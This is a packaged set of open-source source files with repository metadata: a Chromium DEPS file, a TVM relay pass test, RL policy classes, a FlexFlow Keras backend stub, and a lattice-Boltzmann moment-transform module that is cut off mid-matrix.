| 557
|
DEPS
|
include_rules = [
"-content/public/android/java",
"+content/public/android/java/src/org/chromium/content_public",
"+content/public/test/android",
"+cc",
"+components/embedder_support/android/web_contents_delegate_jni_headers",
"+components/keyed_service",
"+components/url_formatter/android/java",
"+content/public/browser",
"+content/public/common",
"+net/android/java/src/org/chromium/net",
"+third_party/blink/public/common/context_menu_data/context_menu_data.h",
"+ui/accessibility",
"+ui/android",
"+ui/base",
"+ui/gfx"
]
|
|
b0c50b90b0a277a2c6a9a43daac3673657b6e198
|
2d05050d0ada29f7680b4df20c10bb85b0530e45
|
/tests/python/relay/test_pass_annotate_spans_defuse.py
|
c513c592d61174df7de2ea35deb04c543ef7237b
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"Zlib",
"LLVM-exception",
"BSD-2-Clause"
] |
permissive
|
apache/tvm
|
87cb617f9a131fa44e1693303aaddf70e7a4c403
|
d75083cd97ede706338ab413dbc964009456d01b
|
refs/heads/main
| 2023-09-04T11:24:26.263032
| 2023-09-04T07:26:00
| 2023-09-04T07:26:00
| 70,746,484
| 4,575
| 1,903
|
Apache-2.0
| 2023-09-14T19:06:33
| 2016-10-12T22:20:28
|
Python
|
UTF-8
|
Python
| false
| false
| 2,017
|
py
|
test_pass_annotate_spans_defuse.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for annotating spans."""
import tvm
import tvm.relay as relay
from tvm.relay import testing
import tvm.testing
def test_annotate_spans_compatibility():
data = relay.var("data", relay.TensorType((1, 3, 64, 64), "float32"))
weight = relay.var("weight")
bn_gamma = relay.var("bn_gamma")
bn_beta = relay.var("bn_beta")
bn_mmean = relay.var("bn_mean")
bn_mvar = relay.var("bn_var")
simple_net = relay.nn.conv2d(
data=data, weight=weight, kernel_size=(3, 3), channels=3, padding=(1, 1)
)
simple_net = relay.nn.batch_norm(simple_net, bn_gamma, bn_beta, bn_mmean, bn_mvar)[0]
simple_net = relay.Function(relay.analysis.free_vars(simple_net), simple_net)
module, params = testing.create_workload(simple_net)
# Apply some simple passes to legalize the IR.
with tvm.transform.PassContext(opt_level=0):
module, params = relay.optimize(
module, target=tvm.testing.enabled_targets()[0][0], params=params
)
seq = tvm.transform.Sequential([relay.transform.AnnotateSpans(), relay.transform.DefuseOps()])
with tvm.transform.PassContext(opt_level=3):
module = seq(module)
if __name__ == "__main__":
tvm.testing.main()
|
521e4212a5ef4bcb6c779a6db94783a36ada7bb1
|
c4714904de05427f52d846678463811898033e4f
|
/Safe-RL/safeRL/HCOPE/policies.py
|
15ab8078ce158f2a09a8670740fd65424da0ebdf
|
[
"MIT"
] |
permissive
|
chauncygu/Safe-Reinforcement-Learning-Baselines
|
f19d60058eab4a7ff78c67bc6e845b9ba7dfe454
|
8500c8dd90a2b59a91b988a3c83e529f6c69332f
|
refs/heads/main
| 2023-08-31T12:42:44.973962
| 2023-08-19T13:11:02
| 2023-08-19T13:11:02
| 462,251,155
| 233
| 42
| null | 2023-08-24T11:55:14
| 2022-02-22T10:40:44
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 5,788
|
py
|
policies.py
|
'''
Policy class for computing action from weights and observation vector.
Horia Mania --- hmania@berkeley.edu
Aurelia Guy
Benjamin Recht
'''
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.utils.convert_parameters import vector_to_parameters, parameters_to_vector
from filter import get_filter
class Policy(object):
def __init__(self, policy_params):
self.ob_dim = policy_params['ob_dim']
self.ac_dim = policy_params['ac_dim']
self.weights = np.empty(0)
# a filter for updating statistics of the observations and normalizing inputs to the policies
self.observation_filter = get_filter(policy_params['ob_filter'], shape = (self.ob_dim,))
self.update_filter = True
def update_weights(self, new_weights):
self.weights[:] = new_weights[:]
return
def get_weights(self):
return self.weights
def get_observation_filter(self):
return self.observation_filter
def act(self, ob):
raise NotImplementedError
def copy(self):
raise NotImplementedError
class LinearPolicy(Policy):
"""
Linear policy class that computes action as <w, ob>.
"""
def __init__(self, policy_params):
Policy.__init__(self, policy_params)
self.weights = np.zeros((self.ac_dim, self.ob_dim), dtype = np.float64)
def act(self, ob):
ob = self.observation_filter(ob, update=self.update_filter)
return np.dot(self.weights, ob)
def get_weights_plus_stats(self):
mu, std = self.observation_filter.get_stats()
aux = np.asarray([self.weights, mu, std])
return aux
class MLP(nn.Module):
def __init__(self, input, output):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input, 32)
self.fc2 = nn.Linear(32, output)
def forward(self, x):
x = self.fc1(x)
x = F.relu(x)
# print(x)
#count = x.detach().numpy()
#count = np.where(count==0.0)
#print("COUNT",count[0].shape)
#print("ZERO {}".format(128-np.sum(np.nonzero(count)[0])))
x = self.fc2(x)
return x
class MLP_probs(nn.Module):
def __init__(self, input, output):
super(MLP_probs, self).__init__()
self.fc1 = nn.Linear(input, 32)
self.fc2 = nn.Linear(32, output)
#self.fc1 = nn.Linear(input, output)
def forward(self, x):
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
# print(x)
#count = x.detach().numpy()
#count = np.where(count==0.0)
#print("COUNT",count[0].shape)
#print("ZERO {}".format(128-np.sum(np.nonzero(count)[0])))
#x = self.fc2(x)
x = F.softmax(x)
return x
class BilayerPolicy_softmax(Policy):
"""
Linear policy class that computes action as <w, ob>.
"""
def __init__(self, policy_params,trained_weights= None):
Policy.__init__(self, policy_params)
self.net = MLP_probs(self.ob_dim, self.ac_dim)
#lin_policy = np.load('/home/harshit/work/ARS/trained_policies/Policy_Testerbi2/bi_policy_num_plus149.npz')
#lin_policy = lin_policy.items()[0][1]
#self.weights=None
self.weights = parameters_to_vector(self.net.parameters()).detach().double().numpy()
if trained_weights is not None:
#print("hieohrfoiahfoidanfkjahdfj")
self.net.load_state_dict(torch.load(trained_weights))
#vector_to_parameters(torch.tensor(trained_weights), self.net.parameters())
self.weights = parameters_to_vector(self.net.parameters()).detach().double().numpy()
def update_weights(self, new_weights):
vector_to_parameters(torch.tensor(new_weights), self.net.parameters())
return
def act(self, ob,greedy=True):
ob = self.observation_filter(ob, update=self.update_filter)
obs = torch.from_numpy(ob)
probs = self.net(obs).detach().double().numpy()
if greedy==False:
action = np.random.choice(np.arange(probs.shape[0]), replace=True, p=probs)
return action,probs[action]
return np.argmax(probs),probs[np.argmax(probs)]
def act_action(self, ob,action):
ob = self.observation_filter(ob, update=self.update_filter)
obs = torch.from_numpy(ob)
probs = self.net(obs).detach().double().numpy()
return action,probs[action]
def get_weights_plus_stats(self):
mu, std = self.observation_filter.get_stats()
aux = np.asarray([self.weights, mu, std])
return aux
class BilayerPolicy(Policy):
"""
Linear policy class that computes action as <w, ob>.
"""
def __init__(self, policy_params,trained_weights= None):
Policy.__init__(self, policy_params)
self.net = MLP(self.ob_dim, self.ac_dim)
self.weights = parameters_to_vector(self.net.parameters()).detach().double().numpy()
def update_weights(self, new_weights):
vector_to_parameters(torch.tensor(new_weights), self.net.parameters())
return
def act(self, ob):
ob = self.observation_filter(ob, update=self.update_filter)
obs = torch.from_numpy(ob)
return self.net(obs).detach().double().numpy()
def get_weights_plus_stats(self):
mu, std = self.observation_filter.get_stats()
aux = np.asarray([self.weights, mu, std])
return aux
def check_implementation():
policy_params={'type':'linear',
'ob_filter':'MeanStdFilter',
'ob_dim': 24,
'ac_dim': 4}
policy = BilayerPolicy(policy_params)
print(policy.net)
#check_implementation()
|
d30e88e116bef721cc656d54339760cb428c887b
|
3d4c7b9c179322e6bdb3c7a0c137919364806cb3
|
/python/flexflow/keras/backend/__init__.py
|
738f8e0161be190f5102d7ba33c8172e6964c15c
|
[
"Apache-2.0"
] |
permissive
|
flexflow/FlexFlow
|
291282d27009924a427966e899d7c2fda9c20cec
|
b2ec6cb5d2b898db1ad4df32adf5699bc48aaac7
|
refs/heads/inference
| 2023-09-04T05:25:02.250225
| 2023-09-03T14:15:07
| 2023-09-03T14:15:07
| 160,988,469
| 1,139
| 186
|
Apache-2.0
| 2023-09-14T17:56:24
| 2018-12-08T23:43:13
|
C++
|
UTF-8
|
Python
| false
| false
| 1,149
|
py
|
__init__.py
|
# Copyright 2023 CMU, Facebook, LANL, MIT, NVIDIA, and Stanford (alphabetical)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from __future__ import print_function
import sys
from .backend_functions import batch_dot, sin, cos, exp, pow, sum
# Default backend: FlexFlow.
_BACKEND = 'flexflow'
# import backend
if _BACKEND == 'flexflow':
sys.stderr.write('Using flexflow backend.\n')
from .flexflow_backend import *
else:
raise ValueError('Unknown backend: ' + str(_BACKEND))
def backend():
"""Publicly accessible method
for determining the current backend.
"""
return _BACKEND
|
504a11bbf36e5618aa9e16a805dea02858fcf6ac
|
e7f38fa0aea00207bc94c542524bcf36a540f902
|
/lettuce/moments.py
|
7ea9547031a7cb1191d23a64926d03f74e9c8e8f
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
lettucecfd/lettuce
|
c5cf4c27ee66022e9b6d94ff0380c6190ec59fae
|
63be9197efeb88b843fd349b9e8d1b13d1634c1c
|
refs/heads/master
| 2023-04-28T15:48:42.200866
| 2023-04-13T12:54:10
| 2023-04-13T12:54:10
| 185,307,088
| 106
| 22
|
MIT
| 2023-04-18T07:38:28
| 2019-05-07T02:37:05
|
Python
|
UTF-8
|
Python
| false
| false
| 24,365
|
py
|
moments.py
|
"""
Moments and cumulants of the distribution function.
"""
import warnings
import torch
import lettuce
from lettuce.util import LettuceException, InefficientCodeWarning, get_subclasses, ExperimentalWarning
from lettuce.stencils import Stencil, D1Q3, D2Q9, D3Q27
import numpy as np
__all__ = [
"moment_tensor", "get_default_moment_transform", "Moments", "Transform", "D1Q3Transform",
"D2Q9Lallemand", "D2Q9Dellar", "D3Q27Hermite"
]
_ALL_STENCILS = get_subclasses(Stencil, module=lettuce)
def moment_tensor(e, multiindex):
if isinstance(e, torch.Tensor):
return torch.prod(torch.pow(e, multiindex[..., None, :]), dim=-1)
else:
return np.prod(np.power(e, multiindex[..., None, :]), axis=-1)
def get_default_moment_transform(lattice):
if lattice.stencil == D1Q3:
return D1Q3Transform(lattice)
if lattice.stencil == D2Q9:
return D2Q9Lallemand(lattice)
else:
raise LettuceException(f"No default moment transform for lattice {lattice}.")
class Moments:
def __init__(self, lattice):
self.rho = moment_tensor(lattice.e, lattice.convert_to_tensor(np.zeros(lattice.D)))
self.j = moment_tensor(lattice.e, lattice.convert_to_tensor(np.eye(lattice.D)))
# ... TODO ...
class Transform:
"""Base class that defines the signature for all moment (and cumulant) transforms.
"""
def __init__(self, lattice, names=None):
self.lattice = lattice
self.names = [f"m{i}" for i in range(lattice.Q)] if names is None else names
def __getitem__(self, moment_names):
if not isinstance(moment_names, tuple):
moment_names = [moment_names]
return [self.names.index(name) for name in moment_names]
def transform(self, f):
return f
def inverse_transform(self, m):
return m
def equilibrium(self, m):
"""A very inefficient and basic implementation of the equilibrium moments.
"""
warnings.warn(
"Transform.equilibrium is a poor man's implementation of the moment equilibrium."
"Please consider implementing the equilibrium moments for your transform by hand.",
InefficientCodeWarning
)
f = self.inverse_transform(m)
feq = self.lattice.equilibrium(self.lattice.rho(f), self.lattice.u(f))
return self.transform(feq)
class D1Q3Transform(Transform):
matrix = np.array([
[1, 1, 1],
[0, 1, -1],
[0, 1, 1]
])
inverse = np.array([
[1, 0, -1],
[0, 1 / 2, 1 / 2],
[0, -1 / 2, 1 / 2]
])
names = ["rho", "j", "e"]
supported_stencils = [D1Q3]
def __init__(self, lattice):
super(D1Q3Transform, self).__init__(lattice, self.names)
self.matrix = self.lattice.convert_to_tensor(self.matrix)
self.inverse = self.lattice.convert_to_tensor(self.inverse)
def transform(self, f):
return self.lattice.mv(self.matrix, f)
def inverse_transform(self, m):
return self.lattice.mv(self.inverse, m)
# def equilibrium(self, m):
# # TODO
# raise NotImplementedError
class D2Q9Dellar(Transform):
matrix = np.array(
[[1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 0, -1, 0, 1, -1, -1, 1],
[0, 0, 1, 0, -1, 1, 1, -1, -1],
[-3 / 2, 3, -3 / 2, 3, -3 / 2, 3, 3, 3, 3],
[0, 0, 0, 0, 0, 9, -9, 9, -9],
[-3 / 2, -3 / 2, 3, -3 / 2, 3, 3, 3, 3, 3],
[1, -2, -2, -2, -2, 4, 4, 4, 4],
[0, -2, 0, 2, 0, 4, -4, -4, 4],
[0, 0, -2, 0, 2, 4, 4, -4, -4]]
)
inverse = np.array(
[[4 / 9, 0, 0, -4 / 27, 0, -4 / 27, 1 / 9, 0, 0],
[1 / 9, 1 / 3, 0, 2 / 27, 0, -1 / 27, -1 / 18, -1 / 12, 0],
[1 / 9, 0, 1 / 3, -1 / 27, 0, 2 / 27, -1 / 18, 0, -1 / 12],
[1 / 9, -1 / 3, 0, 2 / 27, 0, -1 / 27, -1 / 18, 1 / 12, 0],
[1 / 9, 0, -1 / 3, -1 / 27, 0, 2 / 27, -1 / 18, 0, 1 / 12],
[1 / 36, 1 / 12, 1 / 12, 1 / 54, 1 / 36, 1 / 54, 1 / 36, 1 / 24, 1 / 24],
[1 / 36, -1 / 12, 1 / 12, 1 / 54, -1 / 36, 1 / 54, 1 / 36, -1 / 24, 1 / 24],
[1 / 36, -1 / 12, -1 / 12, 1 / 54, 1 / 36, 1 / 54, 1 / 36, -1 / 24, -1 / 24],
[1 / 36, 1 / 12, -1 / 12, 1 / 54, -1 / 36, 1 / 54, 1 / 36, 1 / 24, -1 / 24]]
)
names = ['rho', 'jx', 'jy', 'Pi_xx', 'Pi_xy', 'PI_yy', 'N', 'Jx', 'Jy']
supported_stencils = [D2Q9]
def __init__(self, lattice):
super(D2Q9Dellar, self).__init__(
lattice, self.names
)
self.matrix = self.lattice.convert_to_tensor(self.matrix)
self.inverse = self.lattice.convert_to_tensor(self.inverse)
def transform(self, f):
return self.lattice.mv(self.matrix, f)
def inverse_transform(self, m):
return self.lattice.mv(self.inverse, m)
def equilibrium(self, m):
warnings.warn("I am not 100% sure if this equilibrium is correct.", ExperimentalWarning)
meq = torch.zeros_like(m)
rho = m[0]
jx = m[1]
jy = m[2]
Pi_xx = jx * jx / rho * 9 / 2
Pi_xy = jx * jy / rho * 9
Pi_yy = jy * jy / rho * 9 / 2
meq[0] = rho
meq[1] = jx
meq[2] = jy
meq[3] = Pi_xx
meq[4] = Pi_xy
meq[5] = Pi_yy
return meq
class D2Q9Lallemand(Transform):
matrix = np.array(
[[1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 0, -1, 0, 1, -1, -1, 1],
[0, 0, 1, 0, -1, 1, 1, -1, -1],
[0, 1, -1, 1, -1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, -1, 1, -1],
[-4, -1, -1, -1, -1, 2, 2, 2, 2],
[0, -2, 0, 2, 0, 1, -1, -1, 1],
[0, 0, -2, 0, 2, 1, 1, -1, -1],
[4, -2, -2, -2, -2, 1, 1, 1, 1]]
)
inverse = np.array(
[[1 / 9, 0, 0, 0, 0, -1 / 9, 0, 0, 1 / 9],
[1 / 9, 1 / 6, 0, 1 / 4, 0, -1 / 36, -1 / 6, 0, -1 / 18],
[1 / 9, 0, 1 / 6, -1 / 4, 0, -1 / 36, 0, -1 / 6, -1 / 18],
[1 / 9, -1 / 6, 0, 1 / 4, 0, -1 / 36, 1 / 6, 0, -1 / 18],
[1 / 9, 0, -1 / 6, -1 / 4, 0, -1 / 36, 0, 1 / 6, -1 / 18],
[1 / 9, 1 / 6, 1 / 6, 0, 1 / 4, 1 / 18, 1 / 12, 1 / 12, 1 / 36],
[1 / 9, -1 / 6, 1 / 6, 0, -1 / 4, 1 / 18, -1 / 12, 1 / 12, 1 / 36],
[1 / 9, -1 / 6, -1 / 6, 0, 1 / 4, 1 / 18, -1 / 12, -1 / 12, 1 / 36],
[1 / 9, 1 / 6, -1 / 6, 0, -1 / 4, 1 / 18, 1 / 12, -1 / 12, 1 / 36]]
)
names = ['rho', 'jx', 'jy', 'pxx', 'pxy', 'e', 'qx', 'qy', 'eps']
supported_stencils = [D2Q9]
def __init__(self, lattice):
super(D2Q9Lallemand, self).__init__(
lattice, self.names
)
self.matrix = self.lattice.convert_to_tensor(self.matrix)
self.inverse = self.lattice.convert_to_tensor(self.inverse)
def transform(self, f):
return self.lattice.mv(self.matrix, f)
def inverse_transform(self, m):
return self.lattice.mv(self.inverse, m)
def equilibrium(self, m):
"""From Lallemand and Luo"""
warnings.warn("I am not 100% sure if this equilibrium is correct.", ExperimentalWarning)
meq = torch.zeros_like(m)
rho = m[0]
jx = m[1]
jy = m[2]
c1 = -2
alpha2 = -8
alpha3 = 4
gamma1 = 2 / 3
gamma2 = 18
gamma3 = 2 / 3
gamma4 = -18
e = 1 / 4 * alpha2 * rho + 1 / 6 * gamma2 * (jx ** 2 + jy ** 2)
eps = 1 / 4 * alpha3 * rho + 1 / 6 * gamma4 * (jx ** 2 + jy ** 2)
qx = 1 / 2 * c1 * jx
qy = 1 / 2 * c1 * jy
pxx = 1 / 2 * gamma1 * (jx ** 2 - jy ** 2)
pxy = 1 / 2 * gamma3 * (jx * jy)
meq[0] = rho
meq[1] = jx
meq[2] = jy
meq[3] = pxx
meq[4] = pxy
meq[5] = e
meq[6] = qx
meq[7] = qy
meq[8] = eps
return meq
"""
D3Q19 is not implemented, yet. Also, the moments should be ordered so that 1...D+1 correspond to momentum,
which is no the case for this matrix.
"""
# class D3Q19DHumieres(NaturalMomentTransform):
# matrix = np.array(
# [[1 / 1, 1, 1, 1, 1, 1, 1, 1, 1 / 1, 1, 1, 1, 1, 1, 1, 1, 1 / 1, 1, 1],
# [-30, -11, -11, -11 / 1, -11, -11, -11, 8, 8, 8, 8 / 1, 8, 8, 8, 8, 8, 8, 8, 8 / 1],
# [12, -4, -4, -4, -4, -4 / 1, -4, 1, 1, 1, 1, 1, 1, 1 / 1, 1, 1, 1, 1, 1],
# [0, 1 / 1, 0, -1, 0, 0, 0, 1, -1, -1, 1, 1, 1, -1, -1, 0, 0, 0, 0],
# [0, -4, 0, 4, 0, 0, 0, 1 / 1, -1, -1, 1, 1, 1, -1, -1, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, -1, 1, 0, 0, 0, 0, -1, 1, 1, -1, -1, 1 / 1, 1, -1],
# [0, 0, 0, 0, 0, 4, -4, 0, 0, 0, 0, -1, 1, 1, -1, -1, 1, 1, -1 / 1],
# [0, 0, 1, 0, -1, 0, 0, 1, 1, -1, -1, 0, 0, 0, 0, 1, 1, -1, -1],
# [0, 0, -4, 0, 4, 0, 0, 1, 1, -1, -1, 0, 0, 0, 0, 1, 1 / 1, -1, -1],
# [0, 2, -1, 2 / 1, -1, -1, -1, 1, 1, 1, 1, 1, 1, 1, 1, -2, -2, -2, -2 / 1],
# [0, -4, 2, -4, 2, 2 / 1, 2, 1, 1, 1, 1, 1, 1, 1 / 1, 1, -2, -2, -2, -2],
# [0, 0, -1, 0, -1, 1, 1, -1, -1 / 1, -1, -1, 1, 1, 1, 1, 0, 0, 0, 0],
# [0, 0, 2 / 1, 0, 2, -2, -2, -1, -1, -1 / 1, -1, 1, 1, 1, 1, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 1, -1, 1, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 1, -1, 1],
# [0, 0, 0, 0, 0, 0, 0, 1, -1, 1, -1, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, -1 / 1, 1, 1, -1, 1, 1, -1, -1, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, -1, -1, 1, -1, 1, 1, -1],
# [0, 0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 0, 0, 0, 0, -1. / 1, -1, 1, 1]]
# )
# inverse = np.array(
# [[1 / 19, -5 / 399, 1 / 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [1 / 19, -11 / 2394, -1 / 63, 1 / 10, -1 / 10, 0, 0, 0, 0, 1 / 18, -1 / 18, 0, 0, 0, 0, 0, 0, 0, 0],
# [1 / 19, -11 / 2394, -1 / 63, 0, 0, 0, 0, 1 / 10, -1 / 10, -1 / 36, 1 / 36, -1 / 12, 1 / 12, 0, 0, 0, 0, 0, 0],
# [1 / 19, -11 / 2394, -1 / 63, -1 / 10, 1 / 10, 0, 0, 0, 0, 1 / 18, -1 / 18, 0, 0, 0, 0, 0, 0, 0, 0],
# [1 / 19, -11 / 2394, -1 / 63, 0, 0, 0, 0, -1 / 10, 1 / 10, -1 / 36, 1 / 36, -1 / 12, 1 / 12, 0, 0, 0, 0, 0, 0],
# [1 / 19, -11 / 2394, -1 / 63, 0, 0, -1. / 10, 1 / 10, 0, 0, -1 / 36, 1 / 36, 1 / 12, -1 / 12, 0, 0, 0, 0, 0, 0],
# [1 / 19, -11. / 2394, -1 / 63, 0, 0, 1 / 10, -1. / 10, 0, 0, -1 / 36, 1 / 36, 1 / 12, -1 / 12, 0, 0, 0, 0, 0, 0],
# [1 / 19, 4 / 1197, 1. / 252, 1 / 10, 1 / 40, 0, 0, 1 / 10, 1 / 40, 1 / 36, 1 / 72, -1 / 12, -1 / 24, 0, 0, 1 / 4, -1 / 8, 0, 1. / 8],
# [1 / 19, 4 / 1197, 1 / 252, -1 / 10, -1 / 40, 0, 0, 1 / 10, 1 / 40, 1 / 36, 1 / 72, -1 / 12, -1 / 24, 0, 0, -1 / 4, 1. / 8, 0, 1 / 8],
# [1 / 19, 4. / 1197, 1 / 252, -1 / 10, -1 / 40, 0, 0, -1 / 10, -1 / 40, 1 / 36, 1 / 72, -1. / 12, -1 / 24, 0, 0, 1 / 4, 1 / 8, 0, -1 / 8],
# [1 / 19, 4 / 1197, 1. / 252, 1 / 10, 1 / 40, 0, 0, -1. / 10, -1 / 40, 1 / 36, 1 / 72, -1 / 12, -1. / 24, 0, 0, -1 / 4, -1 / 8, 0, -1 / 8],
# [1 / 19, 4 / 1197, 1 / 252, 1. / 10, 1 / 40, -1 / 10, -1 / 40, 0, 0, 1 / 36, 1 / 72, 1 / 12, 1 / 24, -1 / 4, 0, 0, 1 / 8, 1 / 8, 0],
# [1 / 19, 4 / 1197, 1 / 252, 1 / 10, 1 / 40, 1. / 10, 1 / 40, 0, 0, 1 / 36, 1. / 72, 1 / 12, 1 / 24, 1 / 4, 0, 0, 1 / 8, - 1 / 8, 0],
# [1. / 19, 4 / 1197, 1 / 252, - 1 / 10, - 1 / 40, 1. / 10, 1 / 40, - 0, - 0, 1 / 36, 1 / 72, 1 / 12, 1 / 24, - 1 / 4, 0, 0, -1. / 8, -1 / 8, 0],
# [1 / 19, 4. / 1197, 1 / 252, -1 / 10, -1 / 40, -1 / 10, -1. / 40, 0, 0, 1 / 36, 1 / 72, 1 / 12, 1 / 24, 1 / 4, 0, 0, -1 / 8, 1 / 8, 0],
# [1 / 19, 4 / 1197, 1 / 252, 0, 0, -1 / 10, -1 / 40, 1 / 10, 1 / 40, -1 / 18, -1 / 36, 0, 0, 0, -1. / 4, 0, 0, -1 / 8, -1 / 8],
# [1 / 19, 4 / 1197, 1 / 252, 0, 0, 1. / 10, 1 / 40, 1 / 10, 1 / 40, -1 / 18, -1. / 36, 0, 0, 0, 1 / 4, 0, 0, 1 / 8, -1 / 8],
# [1 / 19, 4. / 1197, 1 / 252, 0, 0, 1 / 10, 1. / 40, -1 / 10, -1 / 40, -1 / 18, -1 / 36, 0, 0, 0, -1 / 4, 0, 0, 1 / 8, 1 / 8],
# [1 / 19, 4 / 1197, 1. / 252, 0, 0, -1 / 10, -1 / 40, -1. / 10, -1 / 40, -1 / 18, -1 / 36, 0, 0, 0, 1 / 4, 0, 0, -1 / 8, 1. / 8]]
# )
# names = ['rho', 'e', 'eps', 'jx', 'qx', 'jy', 'qy', 'jz', 'qz', '3pxx', '3pixx', 'pww', 'piww', 'pxy', 'pxz', 'pxx', 'mx', 'my', 'mz']
# def __init__(self, lattice):
# assert lattice.stencil == D3Q19
# super(D3Q19DHumieres, self).__init__(
# lattice,
# lattice.convert_to_tensor(self.matrix),
# lattice.convert_to_tensor(self.inverse)
# )
#
# class D3Q27CumulantTransform(Transform):
# def __init__(self, lattice):
# raise NotImplementedError
class D3Q27Hermite(Transform):
matrix = np.array([
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, -1, 0, 0, 0, 0, 0, 0, 0, 0, 1, -1, 1, -1, 1, -1, 1, -1, 1, -1, 1, -1, 1, -1, 1, -1],
[0, 0, 0, 1, -1, 0, 0, 1, -1, 1, -1, 0, 0, 0, 0, 1, -1, -1, 1, 1, -1, 1, -1, -1, 1, -1, 1],
[0, 0, 0, 0, 0, 1, -1, 1, -1, -1, 1, 1, -1, -1, 1, 0, 0, 0, 0, 1, -1, -1, 1, 1, -1, -1, 1],
[-1 / 3, 2 / 3, 2 / 3, -1 / 3, -1 / 3, -1 / 3, -1 / 3, -1 / 3, -1 / 3, -1 / 3, -1 / 3, 2 / 3, 2 / 3, 2 / 3,
2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, 1, 1, -1, -1, -1, -1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, -1],
[-1 / 3, -1 / 3, -1 / 3, 2 / 3, 2 / 3, -1 / 3, -1 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, -1 / 3, -1 / 3, -1 / 3,
-1 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3],
[0, 0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, -1, -1, -1, -1, 1, 1],
[-1 / 3, -1 / 3, -1 / 3, -1 / 3, -1 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3,
-1 / 3, -1 / 3, -1 / 3, -1 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3, 2 / 3],
[0, 0, 0, -1 / 3, 1 / 3, 0, 0, -1 / 3, 1 / 3, -1 / 3, 1 / 3, 0, 0, 0, 0, 2 / 3, -2 / 3, -2 / 3, 2 / 3, 2 / 3,
-2 / 3, 2 / 3, -2 / 3, -2 / 3, 2 / 3, -2 / 3, 2 / 3],
[0, 0, 0, 0, 0, -1 / 3, 1 / 3, -1 / 3, 1 / 3, 1 / 3, -1 / 3, 2 / 3, -2 / 3, -2 / 3, 2 / 3, 0, 0, 0, 0, 2 / 3,
-2 / 3, -2 / 3, 2 / 3, 2 / 3, -2 / 3, -2 / 3, 2 / 3],
[0, -1 / 3, 1 / 3, 0, 0, 0, 0, 0, 0, 0, 0, -1 / 3, 1 / 3, -1 / 3, 1 / 3, 2 / 3, -2 / 3, 2 / 3, -2 / 3, 2 / 3,
-2 / 3, 2 / 3, -2 / 3, 2 / 3, -2 / 3, 2 / 3, -2 / 3],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, -1, -1, 1, -1, 1, 1, -1],
[0, -1 / 3, 1 / 3, 0, 0, 0, 0, 0, 0, 0, 0, 2 / 3, -2 / 3, 2 / 3, -2 / 3, -1 / 3, 1 / 3, -1 / 3, 1 / 3, 2 / 3,
-2 / 3, 2 / 3, -2 / 3, 2 / 3, -2 / 3, 2 / 3, -2 / 3],
[0, 0, 0, 0, 0, -1 / 3, 1 / 3, 2 / 3, -2 / 3, -2 / 3, 2 / 3, -1 / 3, 1 / 3, 1 / 3, -1 / 3, 0, 0, 0, 0, 2 / 3,
-2 / 3, -2 / 3, 2 / 3, 2 / 3, -2 / 3, -2 / 3, 2 / 3],
[0, 0, 0, -1 / 3, 1 / 3, 0, 0, 2 / 3, -2 / 3, 2 / 3, -2 / 3, 0, 0, 0, 0, -1 / 3, 1 / 3, 1 / 3, -1 / 3, 2 / 3,
-2 / 3, 2 / 3, -2 / 3, -2 / 3, 2 / 3, -2 / 3, 2 / 3],
